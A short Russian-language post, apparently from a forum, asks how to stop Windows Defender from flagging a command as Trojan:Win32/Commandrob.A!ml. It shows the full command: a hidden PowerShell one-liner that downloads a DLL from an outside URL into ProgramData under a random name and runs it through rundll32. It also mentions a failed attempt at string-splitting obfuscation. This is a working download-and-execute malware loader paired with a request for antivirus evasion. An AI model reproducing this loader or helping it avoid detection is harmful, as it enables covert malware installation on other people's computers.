При выполнении через WIN+R команды вида
получаю от windef детект Trojan:Win32/Commandrob.A!ml попытка обфускации команды например через разбитие rundll32 на части ('run'+'dll32') не помогает.
Bash:
powershell -w hidden -c "$f=$env:ProgramData+'\'+[guid]::NewGuid()+'.tmp';iwr 'https://com.com/dll.aspx' -UseBasicParsing -OutFile $f;rundll32.exe `"$f`",DllRegisterServer"